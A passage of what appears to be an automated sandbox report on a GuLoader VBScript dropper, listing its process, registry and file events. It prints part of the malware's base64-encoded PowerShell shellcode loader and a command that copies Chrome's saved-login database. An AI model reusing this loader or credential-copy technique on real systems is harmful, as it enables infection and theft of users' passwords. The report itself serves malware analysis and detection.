"IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220113 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\FORSVARL.dat Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@25/17@2/2
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
Source: C:\Windows\SysWOW64\cmstp.exe File written: C:\Users\user\AppData\Roaming\O118090C\O11logri.ini Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\explorer.exe
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: cmstp.pdbGCTL source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp
Source: Binary string: ieinstal.pdbGCTL source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
Source: Binary string: ieinstal.pdb source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdb source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", " -EncodedCommand "IwBSAHYAZQBuACAAUABBA", "", "", "0")
Yara detected GuLoader
Source: Yara match File source: 00000012.00000000.495265082.0000000002D00000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0761CC11 push es; iretd 4_2_0761CC12
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0761CC88 push es; iretd 4_2_0761CC8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_0761CC8B push es; iretd 4_2_0761CC92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07616930 push es; ret 4_2_07616940
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 18_2_1ED5D0D1 push ecx; ret 18_2_1ED5D0E4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0482D0D1 push ecx; ret 27_2_0482D0E4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_006479E4 pushfd ; retf 27_2_006479E5
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_00647316 push ds; retf 27_2_00647318
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064D4C5 push eax; ret 27_2_0064D518
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064D57C push eax; ret 27_2_0064D582
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064E517 push ss; ret 27_2_0064E518
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064D512 push eax; ret 27_2_0064D518
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064D51B push eax; ret 27_2_0064D582
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 27_2_0064DE6D push dword ptr [ACFE0177h]; ret 27_2_0064DF57
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline Jump to behavior

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmstp.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KLQL6TZPVV Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KLQL6TZPVV Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
